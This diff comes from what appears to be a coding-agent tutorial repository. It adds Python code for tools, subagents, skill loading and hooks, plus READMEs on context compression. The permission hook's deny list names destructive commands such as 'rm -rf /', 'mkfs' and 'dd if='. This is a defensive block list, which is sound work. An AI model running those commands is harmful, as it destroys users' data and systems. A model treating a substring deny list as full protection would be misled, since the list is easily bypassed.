"input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] +SUB_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob} + +def spawn_subagent(description: str) -> str: + print(f"\n\033[35m[Subagent spawned]\033[0m") + messages = [{"role": "user", "content": description}] + for _ in range(30): + response = client.messages.create(model=MODEL, system=SYSTEM, + messages=messages, tools=SUB_TOOLS, max_tokens=8000) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(f" \033[90m[sub] {block.name}: {str(output)[:100]}\033[0m") + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + result = extract_text(messages[-1]["content"]) + print(f"\033[35m[Subagent done]\033[0m") + return result + + +# ═══════════════════════════════════════════════════════════ +# NEW in s07: load_skill — runtime full content loading +# 
═══════════════════════════════════════════════════════════ + +def load_skill(name: str) -> str: + """Load full skill content. Injected via tool_result, not system prompt.""" + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() + + +# ═══════════════════════════════════════════════════════════ +# Tool Registry — all tools from s02-s07 +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, + {"name": "todo_write", "description": "Create and manage a task list for your current coding session.", + "input_schema": {"type": "object", "properties": {"todos": {"type": "array", "items": {"type": "object", "properties": {"content": {"type": "string"}, "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}}}}}}}, + {"name": "task", "description": "Launch a subagent to handle a complex subtask. 
Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, + # s07: skill tool (catalog is already in SYSTEM prompt, this loads full content) + {"name": "load_skill", "description": "Load the full content of a skill by name.", + "input_schema": {"type": "object", "properties": {"name": {"type": "string"}}, "required": ["name"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, "todo_write": run_todo_write, + "task": spawn_subagent, "load_skill": load_skill, +} + + +# ═══════════════════════════════════════════════════════════ +# FROM s04 (unchanged): Hook System +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: + return result + return None + +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] + +def permission_hook(block): + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{p}'\033[0m") + return "Permission denied" + return None + +def log_hook(block): + print(f"\033[90m[HOOK] {block.name}\033[0m") + return None + +def context_inject_hook(query: str): + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +def summary_hook(messages: list): + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) 
+register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s05-s06 + nag reminder +# ═══════════════════════════════════════════════════════════ + +rounds_since_todo = 0 + +def agent_loop(messages: list): + global rounds_since_todo + while True: + if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) + + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + rounds_since_todo += 1 + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + if block.name == "todo_write": + rounds_since_todo = 0 + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s07: Skill Loading — catalog in SYSTEM, content on demand") + print("Type a question, press Enter. 
Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms07 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s07_skill_loading/images/skill-overview.en.svg b/s07_skill_loading/images/skill-overview.en.svg new file mode 100644 index 000000000..8b838b844 --- /dev/null +++ b/s07_skill_loading/images/skill-overview.en.svg @@ -0,0 +1,111 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Skill Loading — catalog at startup, content on demand + + + s06 preserved + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + Return result + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + + TOOL_HANDLERS + + + + bash · read · write + + edit · glob · todo + + task (subagent) + + + s07 new + + + load_skill + + + + Results appended to messages[], loop continues + + + + + + ① build_system() + Scan skills/ first line at startup + → inject SYSTEM prompt + + + + ② load_skill(name) + Read full SKILL.md at runtime + → inject tool_result + + + + SYSTEM has skill catalog, carried every turn + + + + + + + + s06 preserved (loop, hooks, TODO, subagent — unchanged) + + s07 new (startup catalog in SYSTEM + load_skill tool) + diff --git a/s07_skill_loading/images/skill-overview.ja.svg b/s07_skill_loading/images/skill-overview.ja.svg new file mode 100644 index 000000000..662351120 --- /dev/null +++ b/s07_skill_loading/images/skill-overview.ja.svg @@ -0,0 +1,111 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Skill Loading — 起動時にカタログ注入、実行時にオンデマンド読み込み + + + s06 維持 + + + + messages[] + + + + + + + LLM + stop_reason? 
+ + + + No + + 結果を返す + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + + TOOL_HANDLERS + + + + bash · read · write + + edit · glob · todo + + task (subagent) + + + s07 新規 + + + load_skill + + + + 結果を messages[] に追加、ループ継続 + + + + + + ① build_system() + 起動時に skills/ の 1 行目をスキャン + → SYSTEM プロンプトに注入 + + + + ② load_skill(name) + 実行時に完全な SKILL.md を読み取り + → tool_result に注入 + + + + SYSTEM にスキルカタログ、毎ターン携帯 + + + + + + + + s06 維持(ループ、フック、TODO、サブ Agent — 変更なし) + + s07 新規(起動時カタログ注入 SYSTEM + load_skill ツール) + diff --git a/s07_skill_loading/images/skill-overview.svg b/s07_skill_loading/images/skill-overview.svg new file mode 100644 index 000000000..ae6c1d5ec --- /dev/null +++ b/s07_skill_loading/images/skill-overview.svg @@ -0,0 +1,111 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Skill Loading — 启动时注入目录,运行时按需加载内容 + + + s06 保留 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + trigger_hooks + PreToolUse + + + + + + + TOOL_HANDLERS + + + + bash · read · write + + edit · glob · todo + + task (subagent) + + + s07 新增 + + + load_skill + + + + 结果追加到 messages[],循环继续 + + + + + + ① build_system() + 启动时扫描 skills/ 第一行 + → 注入 SYSTEM prompt + + + + ② load_skill(name) + 运行时读完整 SKILL.md + → 注入 tool_result + + + + SYSTEM 含技能目录,每轮都带 + + + + + + + + s06 保留(循环、钩子、TODO、subagent — 完全不变) + + s07 新增(启动时目录注入 SYSTEM + load_skill 工具) + diff --git a/s08_context_compact/README.en.md b/s08_context_compact/README.en.md new file mode 100644 index 000000000..89e9e4ede --- /dev/null +++ b/s08_context_compact/README.en.md @@ -0,0 +1,265 @@ +# s08: Context Compact — Context Will Fill Up, Have a Way to Make Room + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → s07 → `s08` → [s09](../s09_memory/) → s10 → ... → s19 +> *"Context will fill up — have a way to make room"* — Four-layer compression pipeline: cheap first, expensive last. +> +> **Harness Layer**: Compression — clean memory, unlimited sessions. 
+ +--- + +## The Problem + +The agent is running along, then freezes. + +It has bash, read, write — all the capabilities it needs. But it read a 1000-line file (~4000 tokens), then read 30 more files, ran 20 commands. Every command's output, every file's contents, all pile up in the `messages` list. + +The context window is finite. Once full, the API outright rejects the call — `prompt_too_long`. + +**Without compression, an agent simply cannot work on large projects.** + +--- + +## The Solution + +![Compact Overview](images/compact-overview.en.svg) + +Everything from s07 — the loop, skill loading, sub-agents — stays intact. The only change: insert three pre-processors (0 API calls) before each LLM call, trigger an LLM summary (1 API call) when tokens still exceed the threshold, and emergency-trim if the API throws an error. + +The core design in one sentence: **cheap first, expensive last.** + +--- + +## How It Works + +![Four-layer compression pipeline](images/compaction-layers.en.svg) + +### L1: snip_compact — Trim Irrelevant Old Conversation + +The agent ran 80 turns of conversation, accumulating 160 `messages`. The very first "help me create hello.py" is barely relevant to current work, yet it still occupies space. + +Message count exceeds 50 → keep the first 3 (initial context) and the last 47 (current work), trim the middle: + +```python +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: + return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + placeholder = {"role": "user", + "content": f"[snipped {snipped} messages from conversation middle]"} + return messages[:keep_head] + [placeholder] + messages[-keep_tail:] +``` + +Entire messages are trimmed, but `tool_result` content within remaining messages keeps accumulating — message #34 may still hold 30KB of old file contents. → L2. 
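A quick standalone check of the arithmetic: for the 80-turn / 160-message session above, 3 head + 47 tail survive and 110 get snipped. The function is repeated verbatim so the snippet runs on its own (the all-user toy messages stand in for a real alternating transcript):

```python
def snip_compact(messages, max_messages=50):
    if len(messages) <= max_messages:
        return messages
    keep_head, keep_tail = 3, max_messages - 3
    snipped = len(messages) - keep_head - keep_tail
    placeholder = {"role": "user",
                   "content": f"[snipped {snipped} messages from conversation middle]"}
    return messages[:keep_head] + [placeholder] + messages[-keep_tail:]

# toy stand-in for an 80-turn session
history = [{"role": "user", "content": f"msg {i}"} for i in range(160)]
compacted = snip_compact(history)

assert len(compacted) == 51                               # 3 head + placeholder + 47 tail
assert "snipped 110 messages" in compacted[3]["content"]  # 160 - 3 - 47
assert compacted[0]["content"] == "msg 0"                 # initial context kept
assert compacted[-1]["content"] == "msg 159"              # current work kept
```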
+ +### L2: micro_compact — Placeholder for Old Tool Results + +![Old results placeholder](images/micro-compact.en.svg) + +The agent read 10 files consecutively. The full contents of reads 1–7 are still sitting in context, no longer needed, but hogging large amounts of space. + +Keep only the 3 most recent `tool_result` entries intact; replace older ones with a one-line placeholder: + +```python +KEEP_RECENT_TOOL_RESULTS = 3 + +def micro_compact(messages): + tool_results = collect_tool_result_blocks(messages) + if len(tool_results) <= KEEP_RECENT_TOOL_RESULTS: + return messages + for _, _, block in tool_results[:-KEEP_RECENT_TOOL_RESULTS]: + if len(block.get("content", "")) > 120: + block["content"] = "[Earlier tool result compacted. Re-run if needed.]" + return messages +``` + +Old results are cleared, but a single new result can be 500KB — one `cat` of a large file can max out the context. → L3. + +### L3: tool_result_budget — Persist Large Results to Disk + +![Large results to disk](images/layer1-budget.en.svg) + +The model read 5 large files in one go; all `tool_result` blocks in the last user message total 500KB. + +Sum the size of all `tool_result` blocks in the last user message. If over 200KB → sort by size, starting from the largest, persist to `.task_outputs/tool-results/`, keeping only a `` marker + a 2000-character preview in context. The model sees the marker and knows the full content is on disk, re-reading it when needed. 
+ +```python +def tool_result_budget(messages, max_bytes=200_000): + last = messages[-1] + blocks = [(i, b) for i, b in enumerate(last["content"]) + if b.get("type") == "tool_result"] + total = sum(len(str(b.get("content", ""))) for _, b in blocks) + if total <= max_bytes: + return messages + ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True) + for idx, block in ranked: + if total <= max_bytes: + break + block["content"] = persist_large_output(block["tool_use_id"], str(block["content"])) + total = recalculate_total(blocks) + return messages +``` + +The first three layers are all plain-text / structural operations — 0 API calls — but they cannot "understand" conversation content. Context may still be too large. → L4. + +### L4: compact_history — Full LLM Summary + +![Full LLM summary](images/auto-compact.en.svg) + +All three previous layers have run, but after 30 minutes of continuous work on a huge project, tokens still exceed the threshold. + +Three-step process: + +1. **Save transcript**: Write the full conversation to `.transcripts/` in JSONL format. No information is lost — it's simply moved out of active context. +2. **LLM generates summary**: Send conversation history to the LLM, asking it to preserve key information: current goals, important findings, modified files, remaining work, user constraints, etc. +3. **Replace message list**: All old messages are replaced with a single summary. After summarization, the most recent file contents are automatically re-attached so the model doesn't lose current file context. + +```python +def compact_history(messages, state): + transcript_path = write_transcript(messages) # Save full conversation first + summary = summarize_history(messages) # LLM generates summary + state.has_compacted = True + return [{"role": "user", + "content": f"[Compacted]\n\n{summary}"}] +``` + +**Circuit breaker**: After 3 consecutive failures, stop retrying to prevent an infinite loop wasting API calls. 
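One way to implement that breaker is a failure counter kept in `state`. This is a minimal sketch under our own naming: the `compact_failures` field and the injected `summarize` callable are illustrative, not from the source; `summarize` stands in for the expensive LLM call:

```python
MAX_COMPACT_FAILURES = 3

def compact_with_breaker(messages, state, summarize):
    """Wrap summarization with a circuit breaker: after 3 consecutive
    failures, give up and return the history unchanged."""
    if state.get("compact_failures", 0) >= MAX_COMPACT_FAILURES:
        return messages                      # breaker open: skip compaction
    try:
        summary = summarize(messages)        # the expensive LLM call
    except Exception:
        state["compact_failures"] = state.get("compact_failures", 0) + 1
        return messages                      # failed: count it, keep history
    state["compact_failures"] = 0            # success resets the breaker
    return [{"role": "user", "content": f"[Compacted]\n\n{summary}"}]
```

After the third consecutive failure the wrapper stops calling `summarize` entirely, so a broken summarizer cannot burn API calls in a loop; a single success resets the counter.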
+ +### Reactive: reactive_compact + +Sometimes the API still returns `prompt_too_long` (413) — when context grows faster than compression triggers. + +This triggers **reactive_compact**: more aggressive than compact_history, it retreats from the tail, trimming to an API-acceptable size with byte-level precision, keeping only the last 5 messages + summary. + +```python +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + tail = messages[-5:] + return [{"role": "user", + "content": f"[Reactive compact]\n\n{summary}"}, *tail] +``` + +### Putting It All Together + +```python +def agent_loop(messages, state): + while True: + # Three pre-processors (0 API calls) + messages[:] = snip_compact(messages) # Trim middle + messages[:] = micro_compact(messages) # Old results placeholder + messages[:] = tool_result_budget(messages) # Large results to disk + + # Still too much? LLM summary (1 API call) + if estimate_token_count(messages) > THRESHOLD: + messages[:] = compact_history(messages, state) + + try: + response = client.messages.create(...) + except PromptTooLongError: + messages[:] = reactive_compact(messages) # Emergency + continue + # ... tool execution ... +``` + +**The order must not be swapped.** Cheap first, expensive last. Emergency triggers only on error. 
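The cheap layers really are free to try: they need no API key. This sketch repeats `micro_compact` in a condensed, self-contained form (the inline comprehension stands in for the `collect_tool_result_blocks` helper) and feeds it ten fake tool results:

```python
KEEP_RECENT_TOOL_RESULTS = 3

def micro_compact(messages):
    # Collect every tool_result block across the history, oldest first.
    results = [b for m in messages if isinstance(m.get("content"), list)
               for b in m["content"] if b.get("type") == "tool_result"]
    # Replace all but the newest 3 with a short placeholder.
    for block in results[:-KEEP_RECENT_TOOL_RESULTS]:
        if len(str(block.get("content", ""))) > 120:
            block["content"] = "[Earlier tool result compacted. Re-run if needed.]"
    return messages

messages = []
for i in range(10):  # simulate 10 file reads, 5000 chars each
    messages.append({"role": "user", "content": [
        {"type": "tool_result", "tool_use_id": f"t{i}", "content": "x" * 5000}]})

micro_compact(messages)
full = [m for m in messages if len(str(m["content"][0]["content"])) == 5000]
print(len(full))  # → 3, only the newest three results keep their payload
```

Roughly 35KB of dead weight disappears before the model ever sees the history, with zero API calls spent.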
+ +--- + +## Changes From s07 + +| Component | Before (s07) | After (s08) | +|-----------|-------------|-------------| +| Context management | None (context grows unbounded) | Four-layer compression pipeline + emergency | +| New functions | — | snip_compact, micro_compact, tool_result_budget, compact_history, reactive_compact | +| Tools | bash, read_file, write_file, edit_file, glob, todo_write, task, load_skill (8) | bash, read_file, write_file, task, list_skills, load_skill, compact (7) | +| Loop | LLM call → tool execution | Three pre-processors before each turn + threshold-triggered compact_history | +| Design principle | — | Cheap first, expensive last | + +--- + +## Try It + +```sh +cd learn-claude-code +python s08_context_compact/code.py +``` + +Try these prompts: + +1. `Read the file README.md, then read code.py, then read s01_agent_loop/README.md` (read multiple files consecutively, observe L2 compressing old results) +2. `Read every file in s08_context_compact/` (read a large amount of content at once, observe L3 persisting to disk) +3. Chat for 20+ turns, observe whether `[auto compact]` or `[reactive compact]` appears + +What to watch for: After each tool execution, are old `tool_result` entries compressed? When tokens exceed the threshold after extended conversation, is summarization triggered automatically? + +--- + +## What's Next + +Context compression lets an agent run for a long time without crashing. But after each compression, the preferences and constraints the user told it are also lost. Can we let the agent **selectively remember** important things? + +s09 Memory → three subsystems: choosing what to remember, extracting key information, consolidating and organizing. Across compressions, across sessions. + +
+
## Deep Dive Into CC Source Code

> The following is based on a complete analysis of CC source code `compact.ts` (1705 lines), `autoCompact.ts` (351 lines), and `microCompact.ts`.

### Execution Order Comparison

| Dimension | Teaching Version | Claude Code |
|-----------|-----------------|-------------|
| Execution order | snip → micro → budget → auto | Identical (`query.ts:379-543`) |
| snip_compact | Keep head 3 + tail 47 | Same; CC only enables it on main thread |
| micro_compact | Text placeholder replacement | API `cache_edits` (does not break prompt cache) |
| micro_compact whitelist | By position (most recent 3) | Read/Bash/Grep/Glob/WebSearch/WebFetch/Edit/Write |
| tool_result_budget | 200KB characters | 200,000 characters (~50K tokens), identical |
| compact_history threshold | Character count estimate | Precise tokens: `contextWindow - maxOutputTokens - 13_000` |
| Summary requirements | 5 categories of info | 9 sections + `<analysis>`/`<summary>` dual tags |
| Compression prompt | Simple prompt | Double-ended hard guardrails forbidding tool calls |
| reactive_compact | Yes (simplified) | Byte-precise, group-by-group rollback |
| Post-compaction recovery | None | Auto re-read recent files |
| Circuit breaker | 3 times | 3 times (telemetry-driven design) |

### Full Constant Reference

| Constant | Value | Source File |
|----------|-------|-------------|
| `AUTOCOMPACT_BUFFER_TOKENS` | 13,000 | `autoCompact.ts:62` |
| `MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES` | 3 | `autoCompact.ts:70` |
| `MAX_OUTPUT_TOKENS_FOR_SUMMARY` | 20,000 | `autoCompact.ts:30` |
| `POST_COMPACT_TOKEN_BUDGET` | 50,000 | `compact.ts:123` |
| `POST_COMPACT_MAX_FILES_TO_RESTORE` | 5 | `compact.ts:122` |
| `POST_COMPACT_MAX_TOKENS_PER_FILE` | 5,000 | `compact.ts:124` |
| Time-based micro_compact interval | 60 minutes | `timeBasedMCConfig.ts:32` |
| PTL retry count | 3 | `compact.ts:227` |
| Stream retry count | 2 | `compact.ts:131` |

### contextCollapse and sessionMemoryCompact
+
CC source code has two additional mechanisms not covered in this teaching version:

- **contextCollapse**: An independent context management system that, when enabled, completely replaces compact_history. It depends on CC's internal compiled modules, so the teaching version does not cover it.
- **sessionMemoryCompact**: Before compact_history, CC first attempts a lightweight summary using existing session memory (covered in s09) without calling the LLM. This mechanism becomes clearer after learning s09.

### What Does the Compression Prompt Look Like?

CC's compression prompt has two hard requirements:

1. **Absolutely no tool calls**: It begins with `CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.`, and appends another REMINDER at the end
2. **Analyze first, then summarize**: The model must first reason in an `<analysis>` tag, then output the formal summary in a `<summary>` tag. The analysis is stripped during formatting

### Teaching Version Simplifications Are Intentional

- micro_compact uses text placeholders → we don't have API-level `cache_edits` access
- Tokens estimated via character count → precise tokenizers are out of scope
- Two auxiliary mechanisms not covered → they fall in the 10% detail category

**The core design principle — cheap first, expensive last — is fully preserved.**
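Stripping the analysis block before storing the summary is a one-line formatting step. A sketch of it (the tag names `<analysis>`/`<summary>` are illustrative stand-ins here; the source only describes an analysis tag followed by a formal-summary tag, with the analysis stripped afterwards):

```python
import re

def extract_summary(model_output: str) -> str:
    """Keep only the formal summary; drop the model's analysis scratchpad."""
    m = re.search(r"<summary>(.*?)</summary>", model_output, re.DOTALL)
    if m:
        return m.group(1).strip()
    # Fallback: no summary tag found, so strip any analysis block and keep the rest.
    return re.sub(r"<analysis>.*?</analysis>", "", model_output, flags=re.DOTALL).strip()

raw = ("<analysis>User is refactoring auth; tests failing in test_login.py</analysis>\n"
       "<summary>Goal: fix login tests. Changed: auth.py. Next: rerun pytest.</summary>")
print(extract_summary(raw))  # → Goal: fix login tests. Changed: auth.py. Next: rerun pytest.
```

The scratchpad buys the model room to reason before committing to a summary, while the stored context stays clean.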
+ + diff --git a/s08_context_compact/README.ja.md b/s08_context_compact/README.ja.md new file mode 100644 index 000000000..b77ee5be0 --- /dev/null +++ b/s08_context_compact/README.ja.md @@ -0,0 +1,265 @@ +# s08: Context Compact — Context will fill up, have a way to make room + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → s07 → `s08` → [s09](../s09_memory/) → s10 → ... → s19 +> *"Context will fill up — have a way to make room"* — 4層圧縮戦略、安価なものを先に、高価なものを後に実行。 +> +> **Harness レイヤー**: 圧縮 — クリーンな記憶、無限のセッション。 + +--- + +## 課題 + +Agent が動いている途中で、止まってしまう。 + +bash、read、write は揃っており、能力は十分。しかし 1000 行のファイル(~4000 token)を読み、さらに 30 のファイルを読み、20 のコマンドを実行したとします。各コマンドの出力、各ファイルの内容がすべて `messages` リストに蓄積されます。 + +コンテキストウィンドウには上限があります。満杯になると、API は即座に拒否します — `prompt_too_long`。 + +**圧縮しなければ、Agent は大規模プロジェクトではまともに動けません。** + +--- + +## ソリューション + +![Compact Overview](images/compact-overview.ja.svg) + +s07 のループ、スキルロード、サブAgent はすべてそのまま。唯一の変更点:各ラウンドの LLM 呼び出し前に 3 層のプリプロセッサ(0 API)を挿入し、token が閾値を超えた場合は LLM 要約(1 API)をトリガー、API エラー時には緊急トリムを実行。 + +コア設計は一言:**安価なものを先に、高価なものを後に。** + +--- + +## 仕組み + +![4層圧縮パイプライン](images/compaction-layers.ja.svg) + +### L1: snip_compact — 無関係な古い会話を切り捨て + +Agent が 80 ラウンドの会話を実行し、`messages` が 160 件まで溜まった。先頭の「hello.py を作って」は現在の作業とほぼ無関係だが、スペースを占有し続けている。 + +メッセージ数が 50 を超えた場合 → 先頭 3 件(初期コンテキスト)と末尾 47 件(現在の作業)を保持し、中間を切り捨て: + +```python +def snip_compact(messages, max_messages=50): + if len(messages) <= max_messages: + return messages + keep_head, keep_tail = 3, max_messages - 3 + snipped = len(messages) - keep_head - keep_tail + placeholder = {"role": "user", + "content": f"[snipped {snipped} messages from conversation middle]"} + return messages[:keep_head] + [placeholder] + messages[-keep_tail:] +``` + +メッセージ全体は切り捨てたが、残ったメッセージ内の `tool_result` 内容はまだ蓄積され続けている — 34 番目のメッセージに 30KB の古いファイル内容が残っているかもしれない。→ L2。 + +### L2: micro_compact — 古いツール結果をプレースホルダに置換 + +![古い結果のプレースホルダ](images/micro-compact.ja.svg) + +Agent が連続して 10 
個のファイルを読んだ。1〜7 回目の完全な内容はまだコンテキストに残っており、もう不要だが、大量のスペースを占有している。

直近 3 件の `tool_result` の完全な内容のみを保持し、それより古いものは 1 行のプレースホルダに置換:

```python
KEEP_RECENT_TOOL_RESULTS = 3

def micro_compact(messages):
    tool_results = collect_tool_result_blocks(messages)
    if len(tool_results) <= KEEP_RECENT_TOOL_RESULTS:
        return messages
    for _, _, block in tool_results[:-KEEP_RECENT_TOOL_RESULTS]:
        if len(block.get("content", "")) > 120:
            block["content"] = "[Earlier tool result compacted. Re-run if needed.]"
    return messages
```

古い結果はクリーンアップされたが、1 件の新しい結果だけで 500KB の可能性がある — 大きなファイルを `cat` するだけでコンテキストがいっぱいになる。→ L3。

### L3: tool_result_budget — 大きな結果をディスクに退避

![大きな結果のディスク退避](images/layer1-budget.ja.svg)

モデルが一度に 5 つの大きなファイルを読み、1 つの user メッセージ内の全 `tool_result` の合計が 500KB に達した。

最後の user メッセージ内のすべての `tool_result` の合計サイズを集計。200KB を超えた場合 → サイズ順にソートし、最大のものから順に `.task_outputs/tool-results/` に退避。コンテキストには退避マーカー + 先頭 2000 文字のプレビューのみを残す。モデルはマーカーを見て完全な内容がディスク上にあることを認識し、必要に応じて再読み込みできる。

```python
def tool_result_budget(messages, max_bytes=200_000):
    last = messages[-1]
    blocks = [(i, b) for i, b in enumerate(last["content"])
              if b.get("type") == "tool_result"]
    total = sum(len(str(b.get("content", ""))) for _, b in blocks)
    if total <= max_bytes:
        return messages
    ranked = sorted(blocks, key=lambda p: len(str(p[1].get("content", ""))), reverse=True)
    for idx, block in ranked:
        if total <= max_bytes:
            break
        block["content"] = persist_large_output(block["tool_use_id"], str(block["content"]))
        total = recalculate_total(blocks)
    return messages
```

最初の 3 層はすべて純粋なテキスト/構造操作 — 0 API 呼び出しだが、会話内容を「理解」することはできない。コンテキストがまだ大きすぎる可能性がある。→ L4。

### L4: compact_history — LLM 全量要約

![LLM 全量要約](images/auto-compact.ja.svg)

最初の 3 層がすべて実行されたが、超大規模プロジェクトで 30 分間連続作業すると、token がまだ閾値を超えている。

3 ステップのフロー:

1. **transcript を保存**:完全な会話を `.transcripts/` に JSONL 形式で書き出す。情報は失われておらず、アクティブなコンテキストから移動されただけ。
2. 
**LLM で要約を生成**:会話履歴を LLM に送り、現在の目標、重要な発見、変更済みファイル、残りの作業、ユーザーの制約などの重要な情報を保持するよう指示。 +3. **メッセージリストを置換**:すべての古いメッセージが 1 件の要約に置き換えられる。要約後、直近のファイル内容が自動的に再付加され、モデルが現在のファイルコンテキストを失わないようにする。 + +```python +def compact_history(messages, state): + transcript_path = write_transcript(messages) # 先に完全な会話を保存 + summary = summarize_history(messages) # LLM で要約を生成 + state.has_compacted = True + return [{"role": "user", + "content": f"[Compacted]\n\n{summary}"}] +``` + +**サーキットブレーカー**:連続 3 回失敗したらリトライを停止し、無限ループによる API 呼び出しの浪費を防止。 + +### 緊急: reactive_compact + +API がまだ `prompt_too_long`(413)を返すことがある — コンテキストの増加速度が圧縮のトリガー速度を上回る場合。 + +この時 **reactive_compact** がトリガーされる:compact_history よりもさらに積極的で、末尾からバイト単位の精度で API が受け入れ可能なサイズまで切り詰め、最後の 5 件のメッセージ + 要約のみを保持。 + +```python +def reactive_compact(messages): + transcript = write_transcript(messages) + summary = summarize_history(messages) + tail = messages[-5:] + return [{"role": "user", + "content": f"[Reactive compact]\n\n{summary}"}, *tail] +``` + +### 合わせて実行 + +```python +def agent_loop(messages, state): + while True: + # 3 つのプリプロセッサ(0 API 呼び出し) + messages[:] = snip_compact(messages) # 中間を切り捨て + messages[:] = micro_compact(messages) # 古い結果をプレースホルダに + messages[:] = tool_result_budget(messages) # 大きな結果をディスクに退避 + + # まだ足りない?LLM 要約(1 API 呼び出し) + if estimate_token_count(messages) > THRESHOLD: + messages[:] = compact_history(messages, state) + + try: + response = client.messages.create(...) + except PromptTooLongError: + messages[:] = reactive_compact(messages) # 緊急対応 + continue + # ... ツール実行 ... 
